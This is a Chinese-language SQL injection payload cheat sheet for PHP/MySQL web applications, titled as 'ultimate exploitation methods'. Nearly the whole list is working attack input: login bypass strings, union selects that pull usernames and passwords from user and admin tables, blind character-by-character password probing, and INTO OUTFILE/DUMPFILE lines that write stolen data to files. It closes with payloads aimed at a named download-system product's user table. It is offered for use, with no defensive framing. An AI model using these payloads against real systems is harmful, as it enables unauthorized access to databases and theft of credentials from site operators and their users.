sql injection终极利用方法

  php注射库

'' or 1=1
'' or ''1=1
''/*
''%23
'' and password=''mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）
'' and LENGTH(password)=''6（探测密码长度）
'' and LEFT(password,1)=''m
'' and LEFT(password,2)=''my
…………………………依次类推
'' union select 1,username,password from user/*
'' union select 1,username,password from user/*
='' union select 1,username,password from user/* （可以是1或者=后直接跟）
99999'' union select 1,username,password from user/*
'' into outfile ''c:/file.txt （导出文件）
='' or 1=1 into outfile ''c:/file.txt
1'' union select 1,username,password from user into outfile ''c:/user.txt
select password FROM admins where login=''John'' INTO DUMPFILE ''/path/to/site/file.txt''
id='' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() （灵活应用查询）
常用查询测试语句，
select * FROM table where 1=1
select * FROM table where ''uuu''=''uuu''
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where ''b'' BETWEEN ''a'' AND ''c''
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END

例如：夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_